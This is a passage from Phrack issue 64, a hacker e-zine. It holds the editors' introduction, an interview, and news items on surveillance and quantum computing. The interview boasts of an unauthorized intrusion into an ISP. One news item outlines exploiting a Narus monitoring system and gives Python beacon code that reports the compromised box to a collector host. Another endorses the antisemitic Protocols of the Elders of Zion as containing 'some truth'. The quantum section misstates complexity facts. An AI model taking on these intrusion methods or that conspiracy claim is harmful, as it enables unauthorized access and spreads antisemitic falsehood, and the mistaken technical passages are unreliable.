Phrack #64













              _                                                _
            _/B\_                                            _/W\_
            (* *)            Phrack #64 file 1               (* *)
            | - |                                            | - |
            |   |               Introduction                 |   |
            |   |                                            |   |
            |   |        By The Circle of Lost Hackers       |   |
            |   |                                            |   |
            |   |                                            |   |

"As long as there is technology, there will be hackers. As long as there
are hackers, there will be PHRACK magazine. We look forward to the next
20 years"

This is how the PHRACK63 Introduction ended, telling everybody that
the staff would change and to expect a release sometime in 2006/2007.
This is that release. This is the new staff, "The Circle of Lost
Hackers". Every new management requires a presentation, and we decided
to do it by prophiling ourselves. Needless to say, we'll stay anonymous,
mainly for security reasons that everyone understands.

Being anonymous doesn't mean being closed at all. The Phrack staff has
always evolved, and will always evolve, depending on who really cares
about being a smart-ass. The staff will always welcome new people who
care about writing cool articles, meet new authors and help them publish
their work in the best conditions. The guarantee of freedom of speech
will be preserved. It is the identity of our journal.

Some people were starting to say that Phrack would never be reborn, that
there would never be a PHRACK64 issue. We heard that while we were
working on it; we smiled and kept going. Others were saying that the
spirit was lost, that everything was lost.

No, Phrack is not dead. Neither is the spirit in it.

All the past Phrack editors have done great work, making Phrack
Magazine "the most technical, most original, most Hacker magazine in
the world", written by the Underground for the Underground.
We are in debt to them; every single hacker, cracker or researcher
of the Underground should feel in debt to them.
For the work they did.
For the spirit they contributed to spread.
For the possibility of having a real Hacker magazine.

No, nothing is or ever was lost. Things change, security becomes a
business, some hackers sell exploits, others post for fame, but Phrack is
here, totally free, for the community. No business, no industry, no money.

We know the burden of responsibility that we carry, and that's why we
worked hard to bring you this release. It wasn't an easy challenge at
all; we lost some people during those months and met new ones. We
decided to make our first issue without a "real" CFP, limiting it to the
closest people we had in the underground. A big thank you to everyone
who participated. We needed to understand who was really involved and
who lacked time, spirit or motivation: giving each one a lot of work to
do (writing, reviewing, extending and coding) was the best way to
succeed in that. This is not a "change of direction"; the next issues
will have their official CFP, and any article is (and has always been)
welcome.

We know that we have a lot to learn; we're improving from our mistakes
and from the problems we've been facing. Likewise, we know that this
release is not "the perfect one", but we think that the right spirit is
there, and so is the endeavor. The promise to make each new release a
better one is a challenge that we want to win.

No, Phrack is not dead. And it will never die.
Long live PHRACK.

   - The Circle of Lost Hackers


For this issue, we're bringing you the following :

0x01 Introduction                                 The Circle of Lost Hackers
0x02 Phrack Prophile of the new editors           The Circle of Lost Hackers
0x03 Phrack World News                            The Circle of Lost Hackers
0x04 A brief history of the Underground scene     The Circle of Lost Hackers
0x05 Hijacking RDS TMC traffic information signal                      lcars
0x06 Attacking the Core: Kernel Exploitation Notes                      twiz
0x07 The revolution will be on YouTube                                gladio
0x08 Automated vulnerability auditing in machine code           Tyler Durden
0x09 The use of set_head to defeat the wilderness                       g463
0x0a Cryptanalysis of DPA-128                                           sysk
0x0b Mac OS X Wars - A XNU Hope                                         nemo
0x0c Hacking deeper in the system                                    ankhara
0x0d The art of exploitation: Autopsy of cvsxpl                  Ac1dB1tch3z
0x0e Facing the cops                                                   Lance
0x0f Remote blind TCP/IP spoofing                                        Lkm
0x10 Hacking your brain: The projection of consciousness             keptune
0x11 International scenes                                            Various

Scene Shoutz:

All the people who helped us during the writing of this issue, especially
assad, js, mx-, krk, sysk. Thank you for your support of Phrack. The
magazine deserves a good amount of work, and it is not possible without
a strong and devoted team of hackers, admins and coders.

The Circle of Lost Hackers is not a precise entity, and people can join
and quit it, but the main goal is always to give Phrack the release
the underground hacking community deserves. You can join us whenever
you want to present decent work to a wider range of people. We
also need reviewers on all topics related to hardware hacking and
body/mind experience.

All the retards who pretend to be blackhat on irc and made a pitiful
attempt to leak Phrack on Full-Disclosure: applause. (Even the changes
in the title were so subtle; a pity you did not put any rm -fr in the
code. Maybe you didn't know how to use uudecode?)

Enjoy the magazine!


Nothing may be reproduced in whole or in part without the prior written
permission from the editors. Phrack Magazine is made available to the
public, as often as possible, free of charge.

|=-----------=[ C O N T A C T   P H R A C K   M A G A Z I N E

Editors           : circle[at]phrack{dot}org
Submissions       : circle[at]phrack{dot}org
Commentary        : loopback[@]phrack{dot}org
Phrack World News : pwn[at]phrack{dot}org


Submissions may be encrypted with the following PGP key:
(Hint: Always use the PGP key from the latest issue)

Version: GnuPG v1.4.5 (GNU/Linux)


phrack:~# head -22 /usr/include/std-disclaimer.h
 *  All information in Phrack Magazine is, to the best of the ability of
 *  the editors and contributors, truthful and accurate.  When possible,
 *  all facts are checked, all code is compiled.  However, we are not
 *  omniscient (hell, we don't even get paid).  It is entirely possible
 *  something contained within this publication is incorrect in some way.
 *  If this is the case, please drop us some email so that we can correct
 *  it in a future issue.
 *  Also, keep in mind that Phrack Magazine accepts no responsibility for
 *  the entirely stupid (or illegal) things people may do with the
 *  information contained herein.  Phrack is a compendium of knowledge,
 *  wisdom, wit, and sass.  We neither advocate, condone nor participate
 *  in any sort of illicit behavior.  But we will sit back and watch.
 *  Lastly, it bears mentioning that the opinions that may be expressed in
 *  the articles of Phrack Magazine are intellectual property of their
 *  authors.
 *  These opinions do not necessarily represent those of the Phrack Staff.



             _                                                _
            _/B\_                                            _/W\_
            (* *)             Phrack #64 file 2              (* *)
            | - |                                            | - |
            |   |              Phrack Pro-Phile              |   |
            |   |                                            |   |
            |   |        By The Circle of Lost Hackers       |   |
            |   |                                            |   |
            |   |                                            |   |

Welcome to Phrack Pro-Phile. Phrack Pro-Phile is created to bring
you, the readers, info about old and highly important controversial
people. The first Phrack Pro-Phile was created in Phrack Issue 4 by
Taran King. Since then, a total of 43 prophiles have been published.
Some well-known hackers were profiled, like Taran King, The Mentor,
Knight Lightning, Lex Luthor, Emmanuel Goldstein, Erik Bloodaxe,
Control-C, Mudge, Aleph One, Route, Voyager, Horizon or, more
recently, Scut.

This prophile is a little different, since it will introduce the new
staff. Since the people composing The Circle of Lost Hackers want to
stay anonymous, the prophile will be more of a "question-and-answer"
session.



Handle: The Circle of Lost Hackers
Call them: call them what you want, just be careful
Handle Origin: Dead Poets Society movie
Date of Birth: from 1977 to 1984
Age at current date: haha
Countries of origin: America, South-America and Europe


Favorite Things

Women    : Angelina Jolie because she was a great hacker in a movie
Cars     : Like everyone, the DeLorean. The only nice car in the movies.
Foods    : Italian food is without a doubt the best food. Some others
           prefer Chinese or Japanese once they've tasted yakitori.
Alcohols : anything which makes you drunk
Drugs    : sex
Music    : Drum and Bass, Sublime, Orbital, Red Hot Chili Peppers, DJ 
           Shadow, The Chemical Brothers, The Mars Volta, more generally 
           death metal, and gothic rock. Abstract electro bands like 
           Boards of Canada.
Movies   : Blade Runner, The Usual Suspects, Fight Club, Kill Bill,
           Hackers (private joke)
Authors  : Gurdjieff, Rudolf Steiner, Rupert Sheldrake, Plato, Stephen
           Hawking, Roger Penrose, George Orwell, Noam Chomsky,
           Sun Tzu, Nikola Tesla, Douglas Hofstadter, Ernesto Guevara,
           Daniel Pennac, Gabriele Romagnoli


Open Interview

Q: Hello
A: Saluto amigo!

Q: Can you introduce yourselves in a few words?
A: The Circle of Lost Hackers is, above all, a group of friends. Two
   years ago, when TESO decided to stop Phrack, the voice of the
   underground decided not to let Phrack die. People started to wonder:
   is Phrack really dead? In no way is it. Phrack is always reborn, from
   the influence of multiple hacking crews that make this possible. But
   at the beginning it was not easy to create a new team; a lot of
   people agreed to continue Phrack, but not really to write or review
   articles. Also, one of the most important things was to have people
   with the right spirit. Now we think that we have a good team, and we
   hope to bring the Underground scene a lot of quality papers like in
   old issues of Phrack, while keeping the technical touch that makes
   Phrack a unique hacking magazine. The Phrack staff evolves and will
   always evolve as new talents get interested in sharing for fun and
   free information.

Q: How many people are composing The Circle of Lost Hackers?
A: We could tell you, but then we would have to kill you. The only
   important thing is that "The Circle of Lost Hackers" is not a
   restricted club. More people will join us, others may leave,
   depending on who really believes in communication, hacking and
   freedom of research and information.

Q: When did you start to play with computers and to learn hacking?
A: Each one of us could answer differently. There's no "perfect" age to
   start, nor is it ever too late. Hacking is researching. It is being
   so obstinate about resolving and understanding things that you spend
   nights over a piece of code, a vulnerability, an electronic device,
   an idea.

   Hacking is something you have inside. Maybe you'll never touch a
   computer or write a line of code, but if you have a "hacking mind"
   it will reveal itself, sooner or later.

   To give you an idea of the first computers of some members of the
   team: a 286, a 486 SX or an Amiga 1000. Each of us started to play
   with computers at the end of the 80s or the beginning of the 90s.
   The hacking life of our team started more or less around '97. Like
   for a lot of people, Phrack and 2600 were and are a great source of
   inspiration, as well as IRC and reading source code.

Q: This interview is quite strange, you ask the questions and give the
   answers at the same time?!?!
A: What's the problem? In Phrack issue 20, Taran King did a prophile
   of himself!!!

Q: Can you tell us about your most memorable experiences?
A: Each of us has a lot of memorable experiences, but we don't really
   have a common experience where we hacked all together. So to make it
   easy, we are going to take three of our "memorable" experiences.

   A subtle modification of p0f which made me find documents that I
   wasn't supposed to find. Some years ago, I had a period when each
   month I tried to focus on the security of one country. One of those
   countries was South Korea, where I owned a big ISP. After spending
   some time figuring out how I could leave the DMZ and enter the LAN,
   I succeeded thanks to a Cisco modification (I like default
   passwords). Once in the LAN, and after hiding my activity
   (userland > kernelland), I installed a slightly modified version of
   p0f. The purpose of this version was to automatically scan all the
   Windows boxes found on the network, mount shared folders and list
   all files in these folders. Nothing fantastic. But one of the
   scanned computers contained a lot of files about the other Korea...
   North Korea. And trust me, there were files that I wasn't supposed
   to find. I couldn't believe it. I could have played the evil guy and
   tried to sell these files for money, but I had (and still have) a
   hacker ethic. So I simply added a text file on the desktop to warn
   the user of the "flaw". After that I left the network and never came
   back. It was more than 5 years ago, so don't ask me the name of the
   ISP; I can't remember.

   Learning hacking by practicing with some of the best hackers
   world-wide. Sometimes you think you know something, but it's almost
   always possible to find someone who proves you the opposite. Whether
   we talk about hacking a very big network with many thousands of
   accounts and knowing exactly how to handle it in minutes in the
   stealthiest manner, or about auditing source code and finding a
   vulnerability in a daemon or an Operating System used by millions of
   people on the planet, there is always someone to be found who
   outsmarts you, just when you thought you were one of the best at
   what you do. I do not want to go into detail, to avoid compromising
   anyone's integrity, but the best experiences are those made of small
   groups (3, 4...) of hackers working on something in common (hacking,
   exploits, coding, audits...), for example in a screen session.
   Learning by seeing the others do. Teaching younger hackers. Sharing
   knowledge in a very restricted personal area. Partying in private
   with hackers from all around the world and getting 0day found, coded
   and used in a single hacking session.

Q: Has any of you been busted in a previous life?
A: We hope not, but who knows?

Q: What do you think about the current scene?
A: We think a lot of things; probably the best answer is to read the
   article "A brief history of the Underground scene" in this issue,
   where we talk about the scene and the Underground.

Q: What's your opinion about old phracks?
A: Great. Old phracks were the first source of information when we were
   starving to learn more. _The_ point of reference. But don't limit
   yourselves to the last 10 issues; all the issues are still
   interesting.

Q: And about PHC?
A: Well, that's an interesting question. To be honest, PHC did not just
   do those bad things we used to hear about on the web or on irc; we
   like some of them and even know a few others very well. Also, the
   two attempted issues 62 and 63 of PHC showed an incontestable
   renewal of the spirit, and there was even some useful information on
   honeypots and protection.

   However, we have a problem with unjustified arrogance. While it's
   true that the security world has a problem with white/black hats, we
   think that the right way to resolve the problem is not to fight
   everyone, especially in such a poor, demonstrative way. It's not our
   conception of hacking. Take the first 20 issues of Phrack and try to
   find an unjustifiably arrogant word/sentence/paragraph: you won't
   find any. The essence of hacking is different: it's learning.
   Hacking to learn.

   You can be a blackhat and work in the IT industry; it's not
   incompatible. We have nothing against PHC, and we think the
   Underground needs a group like PHC. But the Underground needs a
   magazine like Phrack as well. The main battle of PHC is fighting
   whitehats, but it's not Phrack's battle. It has never been the
   purpose of Phrack. If we have to fight against something, it's
   against society, not against whitehats personally (which doesn't
   mean that we support whitehats...). Phrack is about fighting society
   by releasing information about technologies that we are not supposed
   to learn. And these technologies are not only Unix-related and/or
   software-related.

   We agree with them when they say that recent issues of Phrack
   probably helped the security industry too much and that there was a
   lack of spirit. We're doing our best to change that. But we still
   need technical articles. If they want to change something in the
   Underground, they are welcome to contribute to Phrack. Like everyone
   in the Underground.

Q: Full-disclosure or non-disclosure?
A: Semi-disclosure. For us, obviously. Free exchange of techniques,
   ideas and code, but no ready-to-use exploits, nor ready-to-patch
   bug reports.

   Keep your bugs for yourself and for your friends; do your best not
   to let them leak. If you're cool enough, you'll find many, and
   you'll be able to patch your own boxes.

   Disclosing techniques, ideas and code implementations helps other
   Hackers in their work; disclosing bugs or releasing "0-day" exploits
   helps only the Security Industry and the script kiddies.
   And we don't want that.

   You might be an Admin, and you might be thinking: "oh, but my box is
   not safe if I don't know about vulnerabilities". That's true, but
   remember that if only very skilled hackers have a bug, you won't
   have to face an "rm -rf" of the box or a web defacement. That's a
   kiddies' game, not a Hackers' one.

   But that's our opinion. You might have a totally different one, and
   we will respect it. You might even want to release a totally unknown
   bug in Phrack's pages and, if you write a good article, we'll help
   you publish it. Maybe after discussing the idea first.

   As we said in the introduction, the first thing we want to guarantee
   is freedom of speech. That's the identity of our journal.

Q: What's the best advice that you can give to the new generation of
   hackers?
A: First of all, enjoy hacking. Don't do it for fame or to earn money,
   nor to impress girls (hint: it doesn't always work ;)), or only to
   be published somewhere. Hack for yourself, hack for your interest,
   hack to learn.

   Second, be careful. In everything you do, in any relationship you'll
   have. Respect people and try not to disrupt their work just because
   you're distracted or angry.

   Third, have fun. Have a lot of fun.

   And never, never, never set up a honeypot (hi Lance!).

Q: What do you think about starting an Underground World Revolution
   Movement against the establishment ?
A: Do it. But do it Underground. Today's world is too obsessed with
   "visibility". Act, and let the others talk.

Q: What's the future of hacking ?
A: The future is similar to the present and to the past. "Hacking" is
   the resulting mix of curiosity, research for information, fun and
   freedom. Things change, security evolves and so does technology, but
   the "hacker mind" is always the same. There will always be hackers,
   that is, skilled people who want to understand how things really
   work.

   To be more concrete, we think that the near future will see much
   more interest in hardware and embedded systems hacking: hardware
   chip modification to circumvent hardware-based restrictions, mobile
   and mobile-services exploits/attacks, etc.
   Moreover, it seems like more people are hacking for money (or, at
   least, it's more "publicly" known), selling exploits or backdoors.
   Money is usually the source of many evils. It is indeed a good
   motivating factor (moreover, hacking requires time, and having that
   time paid for when you don't have any other work is really helpful),
   but money brings with it the business mind. People who pay hackers
   aren't interested in research; they are interested in business. They
   don't want to pay for months of research that lead to a complex and
   eleet technique; they want a simple php bug to break into other
   companies' websites and change the homepage. They want visible
   impact, not evolved culture.

   We're not for the "hacking-business" idea; you've probably realized
   that. We're not for exploit disclosure either, unless the bug has
   been known for some time and showing the exploit code helps to
   better understand the coding techniques involved. And we don't want
   someone with a lot of money (read: governments and big companies) to
   one day be able to "pay" (and thus "buy") all the hackers around.

   But we're sure that this will never happen, thanks to the
   underground, thanks to people like you who read Phrack, learn,
   create and hack.

Q: Do you have some people or groups to mention ?
A: There are groups and people who have made (or are making) the
   effective evolution of the scene. We try to tell a bit of their
   story in the "International Scenes" phile (starting from this issue
   with: Quebec, Brazil and France). Each country has its story: Italy
   has s0ftpj and antifork, Germany has TESO, THC and Phenoelit (thanks
   for your great ph-neutral party), Russia, France, the Netherlands
   and Belgium have ADM, Synnergy and Devhell, the USA and other
   countries have PHC...

   Each one will have its space in "International Scenes". If you're
   part of it, if you want to tell the "real story", just submit a text
   to us. If you are too paranoid to submit a tfile to Phrack, it's ok.
   If you wish to participate in the underground information, our
   journal is your journal as well, and we can find a solution that
   keeps you anonymous.

Q: Thank you for this interview, I hope readers will enjoy it!
A: No problem, you're welcome. Can I have a beer now?



              _                                                _
            _/B\_                                            _/W\_
            (* *)            Phrack #64 file 3               (* *)
            | - |                                            | - |
            |   |            Phrack World News               |   |
            |   |                                            |   |
            |   |   compiled by The Circle of Lost Hackers   |   |
            |   |                                            |   |
            |   |                                            |   |

The Circle of Lost Hackers is looking for any kind of news related to
security, hacking, conference reports, philosophy, psychology,
surrealism, new technologies, space war, spying systems, information
warfare, secret societies, ... anything interesting! It could be simple
news with just a URL, a short text or a long text. Feel free to send us
your news.

Again, we need your help for this section. We can't know everything; we
try to do our best, but we need you... the scene needs you... humanity
needs you... even your girlfriend needs you, but you should already
know that... :-)

1. Speedy Gonzales news
2. One more outrage to the freedom of expression
3. How we could defeat the Orwellian Narus system
4. Feeling safer in a spying world
5. D-Wave computing demonstrates a quantum computer


--[ 1.

 _____                     _
/  ___|                   | |
\ `--. _ __   ___  ___  __| |_   _
 `--. \ '_ \ / _ \/ _ \/ _` | | | |
/\__/ / |_) |  __/  __/ (_| | |_| |
\____/| .__/ \___|\___|\__,_|\__, |
      | |                     __/ |
      |_|                    |___/
 _____                      _
|  __ \                    | |
| |  \/ ___  _ __  ______ _| | ___  ___
| | __ / _ \| '_ \|_  / _` | |/ _ \/ __|
| |_\ \ (_) | | | |/ / (_| | |  __/\__ \
 \____/\___/|_| |_/___\__,_|_|\___||___/
 _   _
| \ | |
|  \| | _____      _____
| . ` |/ _ \ \ /\ / / __|
| |\  |  __/\ V  V /\__ \
\_| \_/\___| \_/\_/ |___/

-Speedy News-[ There is no age to start hacking ]--

-Speedy News-[ eEye hacked? ]--

-Speedy News-[ Anarchist Cookbook ]--

   The anarchist cookbook version 2006, be careful...

-Speedy News-[ Is Hezbollah better than Israeli militants? ]--

-Speedy News-[ How to be secure like a 31337 DoD dude ]--

-Speedy News-[ Hi I'm Skyper, ex-Phrack and I like Phrack's design! ]--

-Speedy News-[ The most obscure company in the world ]--

A "MUST READ" article...

-Speedy News-[ Terrorism excuse Vs freedom of information ]--

-Speedy News-[ Zero Day can happen to anyone ]--

-Speedy News-[ NSA, contractors and the success of failure ]--

-Speedy News-[ Blood, Bullets, Bombs, and Bandwidth ]--

-Speedy News-[ The day when the BBC predicted the future ]--

-Spirit News-[ Just because we like these websites ]--

--[ 2. One more outrage to the freedom of expression
		by Napoleon Bonaparte

The distribution of a book containing a copy of the Protocols of
the Elders of Zion was stopped in Belgium and France by Israeli 

The authors advance that the bombing of the WTC could be related to
Israel. This is not the place to argue about that statement, but what
is interesting is that 6 years after 11/09/01 we have read probably
more than 100 theories about the possible authors of the WTC bombing:
Al Qaeda, Saudi Arabia, Iraq (!) or even the Americans themselves. But
this book advances the theory that _maybe_ Israel has something to do
with it, and its diffusion was forbidden just one month after its
release.

Before releasing this book, the Belgian association
read it to give its opinion. The result is clear: the book is not
antisemitic. The only two things that could be antisemitic in this book
are:

- the diffusion of "The Protocols of the Elders of Zion" in the annex
of the book. If you take a look on Amazon, you can find more than
30 books containing The Protocols.

- the cover of the book, which shows the US and Israeli flags linked by
a bundle of dollars.

Actually, you can find the same kind of picture on the website of the
Americo-Israeli company Zionoil: . And the
cover of the book was designed before the author found the same picture
on Zionoil's website.

Also, something unsettling in this story is that the book was removed
at the insistence of a Belgian politician, Claude Marinower. And on the
website of this politician, we can see him with Moshe Katsav, the
president of Israel, who was recently accused by Attorney General Meni
Mazuz of having committed rape and other crimes...

So why was the distribution of this book banned? Because the diffusion
of "The Protocols of the Elders of Zion" is dangerous? Maybe, but...

You can find on the Internet or on Amazon some books like "The
Anarchist Cookbook", which is really more "dangerous" than "The
Protocols of the Elders of Zion". In this book you can find information
like how to kill someone or how to make a bomb. If we had to give our
children either "The Anarchist Cookbook" or "The Protocols of the
Elders of Zion", I'm sure that 100% of the population would prefer to
give "The Protocols of the Elders of Zion". Simply because it's not
dangerous.

So why? Probably because there is some truth in this book.

The revelations in this book are not only about 11/09/2001 but also
about the Brabant massacres in Belgium from 1982 to 1985. The authors
advance that these massacres were linked to the GLADIO/stay-behind
network.

As Napoleon Bonaparte said: "History is a set of lies agreed upon".

He was right...







--[ 3. How we could defeat the Orwellian Narus system
		by Napoleon Bonaparte

AT&T, Verizon, VeriSign, Amdocs, Cisco, BellSouth, Top Layer Networks,
Narus, ... all these companies are inter-connected in our wonderful
Orwellian world. And I'm not even talking about companies like Raytheon
or others involved in "ECHELON".

That's not new: our governments spy on us. They eavesdrop on our phone
conversations and our Internet communications, they take beautiful
photos of us with their imaging satellites, they can even see through
walls using reconnaissance satellites (Lacrosse/Onyx?), they install
cameras everywhere in our cities (how many cameras in London???), RFID
tags are more and more present, and with upcoming technologies like
nanotechnology, bio-informatics or smartdust systems there is really
something to worry about.

With all these systems already installed, it's utopian to think that we
could go back to a world without any spying systems. So what can we do?
Probably not a lot. But I would like to propose a funny idea about
NARUS, the system allowing governments to eavesdrop on citizens'
Internet communications.

This short article is not an introduction to Narus. I will just give
you a short description of its capabilities. A longer article could be
written in a future release of Phrack (any volunteers?). So, Narus is
an American company founded in '97. The first work of NARUS was to
analyze IP network traffic for billing purposes. In order to accomplish
this, they strongly contributed to the standardization of the IPDR
Streaming Protocol by releasing API code [1] (study this doc, it's a
key to breaking NARUS). Nowadays, Narus is also part of what I will
call the "spying business". According to their authors, they can
collect data from links, routers, soft switches, IDS/IPS, databases,
..., then normalize, correlate, aggregate and analyze all this data to
provide a comprehensive and detailed model of user, element, protocol,
application and network behaviors. And, most important, everything is
done in real time. So all your e-mails, instant messages, video
streams, P2P traffic, HTTP traffic or VOIP can be monitored. And they
don't care about which transmission technology you use; optical
transmission can also be monitored. This system is simply amazing, and
we should send our congratulations to its designers. But we should also
send our fears...

If we want to block Narus, there is an obvious way: cryptography.
Nowadays, it's quite easy to send an encrypted email. You don't even
have to worry about your email client; everything is transparent (once
configured). The problem is that you need to give your public key to
your interlocutor, which is not really "user friendly". Especially if
the purpose is simply to send an email to your girlfriend. But it's
still the best way to block a system like Narus. Another way to block
Narus is to use steganography, but it's more complicated to implement.

In conclusion, there is no way to totally stop a system like Narus, and
the only good way to block it is to use cryptography. But we, hackers,
can do something against Narus. Something funny. The idea is the
following: we should know where the Narus systems are installed!

First step. An organization, a country or simply someone should buy
a Narus system and reverse it. There are a lot of tools to reverse a
system, free or commercial. Since the purpose of Narus is to analyze
data, its main task is parsing data. And we know that systems which
parse data are the most prone to bugs. So a first idea could be to fuzz
it with random requests and, if that doesn't work, to do some
reversing. Once a bug is detected (and for sure, there IS at least one
bug), the next step is to exploit it. A difficult task, but not
impossible. The most interesting part is the next one: the shellcode.

There are two possibilities: either the system where Narus is installed
has an outgoing Internet connection, or it doesn't. If not, the
shellcode will be quite limited; the "best" idea is maybe just to
destroy the system, but that's not very useful. What is useful is when
Narus is installed on a system with an outgoing Internet connection. We
don't want a shell or anything like that on the system; what we want is
to know where a Narus system is installed. So all our shellcode has to
do is send a ping or a special packet to a server on the Internet
saying "hello, a Narus is installed at this place". We could hold a
database with all the Narus systems we discover in the world.
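
The beacon such a shellcode would send can be as small as one UDP
datagram. Here is a minimal sketch of what the payload could look like;
the MAGIC marker, the payload layout and the collector address are all
made up for illustration.

```python
import socket
import time

MAGIC = b"NARUS-HELLO/1"  # hypothetical marker so the collector can filter noise

def build_beacon(location_hint, when=None):
    """Pack a tiny "a Narus lives here" message: magic | timestamp | hint."""
    ts = int(time.time() if when is None else when)
    return b"|".join([MAGIC, str(ts).encode(), location_hint.encode()])

def send_beacon(payload, collector=("", 5353)):
    """Fire-and-forget UDP: nothing to ACK, little for the host to log."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.sendto(payload, collector)  # collector address is hypothetical

if __name__ == "__main__":
    print(build_beacon("transit-pop-23", when=0))
    # b'NARUS-HELLO/1|0|transit-pop-23'
```

The collector on the other end only has to timestamp the source address
of each datagram to build up the world map of Narus boxes.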

This idea is probably not very difficult to implement. The only bad
thing is that if we release the vulnerability, it won't take Narus
long to patch it.

But after all, what else can we do?

Again, as Napoleon said: "Victory belongs to the most persevering".

And hackers are...


--[ 4. Feeling safer in a spying world
		by Julius Caesar

At first, it's subtle. It just sneaks up on you. The only ones who
notice are the paranoid tinfoil hat nutjobs -- the ones screaming about
conspiracies and big brother. They take a coincidence here and a fact
from over there and come up with 42. It's all about 42.

We need cameras at ATMs, to catch robbers and muggers. Sometimes
they even catch a shot of the Ryder truck driving by in the background.
People get mugged in elevators, so we need some cameras there too.
Traffic can be backed up for a while before the authorities notice, so
let's have some cameras on the highway. Resolution gets better, and we
can catch more child molesters and terrorists if the cameras can record
license plates and faces.

Cameras at intersections catch people running red lights and
speeding. We're getting safer every day.

Some neighborhoods need cameras to catch the hoods shooting each
other. Others need cameras to keep the sidewalks safe for shoppers. It's
all about safety.

Then one day, the former head of the KGIA is in charge, or arranges
for his dimwitted son to fuck up yet again as president of something.

Soon, we're at war. Not with anyone in particular. Just Them. You're
either with us, or you're with Them, and we're gonna git Them.

Our phone calls need to be monitored, to make sure we're not one
of Them. Our web browsing and shopping and banking and reading and
writing and travel and credit all need to be monitored, so we can catch
Them. We'll need to be searched when travelling or visiting a government
building, because we might have pointy metal things or guns on us. We
don't want to be like Them.

It's important to be safe, but how can we tell if we're safe or not? What
if we wander into a place with no cameras? How would we know? What if
our web browsing isn't being monitored? How can we make sure we're safe?

Fortunately, there are ways.

Cameras see through a lens, and lenses have specific shapes with unique
characteristics. If we're in the viewing area  of a camera, then we
are perpendicular to a part of the surface of the lens, which usually
has reflective properties. This allows us to know when we're safely in
view of a camera.

All it takes is a few organic LEDs and a power supply (like a 9V
battery). Arrange the LEDs in a circle about 35mm in diameter, and wire
them appropriately for the power supply. Cut a hole in the center of
the circle formed by the LEDs.

Now look through the hole as you pan around the room. When you're
pointing at a lens, the portion of the curved surface of the lens which
is perpendicular to you will reflect the light of the LEDs directly
back at you. You'll notice a small bright white pinpoint. Blink the
LEDs on and off to make sure it's reflecting your LEDs, and know that
you are now safer.

Worried that your Internet connection may not be properly monitored
for activity that would identify you as one of Them? There are ways to
confirm this too.

Older equipment, such as Carnivore or DCS1000, could often be detected
by traceroute, showing up as odd hops on your route to the
net. As recently as 2006, AT&T's efforts to keep us safe showed up in
traceroute. But the forces of Them have prevailed, and our protectors
were forced to stop watching our net traffic. Almost. We can no longer
feel safe when seeing that odd hop, because it doesn't show up in
traceroute anymore.

It will, however, show up with ping -R, which uses the IP Record Route
option to request that every machine add its IP to the ping packet as
it travels the network.

First, do a traceroute to find out where your ISP connects to the rest
of the net:

 5 (  28.902 ms  14.221 ms  13.883 ms
 6 (  19.833 ms *
 21.768 ms
 7 (  19.781 ms  19.092
 ms  17.356 ms

Hop #5 is on Comcast's network. Hop #6 is their transit provider. We
want to send a ping -R to the transit provider.

[root@phrack root]# ping -R
PING ( from XXX.XXX.XXX.XXX : 56(124) bytes
of data.
64 bytes from icmp_seq=0 ttl=243 time=31.235 msec
RR:	[snip] domain name pointer

An AT&T hop on Level3's network? Wow, we are still safely under the
watchful eye of our magnificent benevolent intelligence agencies. I
feel safer already.

--[ 5. D-Wave demonstrates a quantum computer
	     by aris

On February 13th, 2007, D-Wave made a public demonstration
of their brand-new quantum computer, which could be a revolution in
computing and in cryptography in general. The demonstration took
place in Mountain View, Silicon Valley, though the quantum computer
itself remained in Vancouver, remotely connected over the Internet.

The quantum computer is a hybrid construction of classical computing
and a quantum "accelerator" chip: the classical computer performs the
ordinary operations, isolates the complicated parts, prepares them to
be processed by the quantum chip, then returns the results. The whole
mechanism is meant to be usable over networks (with RPC), to be
accessible to companies that want a quantum computer but can't host one
at their main office (the hardware has special requirements). [1]

The quantum chip is a 16-Qbit engine, built with superconducting
elements.

Previous attempts at quantum computers have been made, none of them
known to have more than 3 or 4 Qbits. D-Wave also claims to be able
to scale that number of Qbits up to 1024 in 2008! That claim made a lot
of people in the scientific community skeptical about D-Wave. The US
National Aeronautics and Space Administration (commonly known as NASA)
confirmed to the press that they built the special chip for D-Wave,
conforming to their specifications. [2]

Now, how does the chip work? D-Wave hasn't released many details
about the internals of their chip. They chose superconductors
because they make it easier to exploit quantum mechanics. When atoms
are very cold (approaching 0 K), they become superconducting. They take
on special characteristics, including the fact that their electrons
show a different quantum behavior.

Internally, the chip contains 16 Qbits arranged in a 4x4 grid,
each Qbit being coupled with its four immediate neighbors and some on
the diagonals. [3]

The coupling of Qbits is what gives them their power: a Qbit is
believed to be in two states at the same time. When coupling two Qbits,
the combination of their states contains four states, and so on.
The more Qbits are coupled together, the more states they can hold at
once, and when running an algorithm on them, you manipulate all of
those states simultaneously, giving a very important performance boost.
By its nature, it may even help to attack NP-complete problems, that
is, problems for which no polynomial-time algorithm is known (think
of large sudoku grids, multivariate polynomial systems, factoring large
integers...).
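
The exponential growth described above is easy to see numerically: a
register of n coupled Qbits is described by a vector of 2^n amplitudes.
Here is a small sketch in plain Python (no quantum library involved),
growing a register one Qbit at a time, each new Qbit added in the equal
(|0>+|1>)/sqrt(2) superposition:

```python
import math

def add_qubit_in_superposition(state):
    """Tensor the register with one qubit in (|0>+|1>)/sqrt(2):
    every existing amplitude splits into two equal halves."""
    h = 1.0 / math.sqrt(2.0)
    return [amp * h for amp in state for _ in (0, 1)]

state = [1.0]            # empty register: a single amplitude
for _ in range(16):      # grow to the 16 Qbits of the D-Wave chip
    state = add_qubit_in_superposition(state)

print(len(state))        # 65536 = 2**16 simultaneous basis states
```

Each added Qbit doubles the vector, which is exactly why simulating (or
building) large quantum registers gets hard so fast.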

Not coupling all of their Qbits makes their chip easier to build and
to scale, but their 16-Qbit computer is not equal to the theoretical
16-Qbit computers academics and governments have been trying to build
for years.

The impact of this news on the world is currently minimal. Their chips
currently work slower than a low-range personal computer and cost
thousands of dollars, but maybe in a few years it will become a real
solution for solving NP problems.

The NP problem that most people involved in security know is obviously
the factoring of large numbers. We even have a proof that there exists
a *polynomial-time* algorithm to factor the product of two large
primes: it is named Shor's algorithm. It means that when we have the
hardware to run it, factoring a 1024-bit RSA private key will take only
polynomially longer than factoring a 512-bit key, instead of
exponentially longer.

It completely destroys the security of public-key cryptography as we
know it now.
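
For the curious, the quantum part of Shor's algorithm only finds the
order r of a random a modulo N; the factors then fall out classically
from gcd(a^(r/2) +- 1, N). A toy sketch of that classical
post-processing follows; the order is brute-forced here, which is
exactly the step a quantum computer would make fast.

```python
from math import gcd

def order(a, n):
    """Smallest r > 0 with a^r = 1 (mod n) -- the step Shor's quantum
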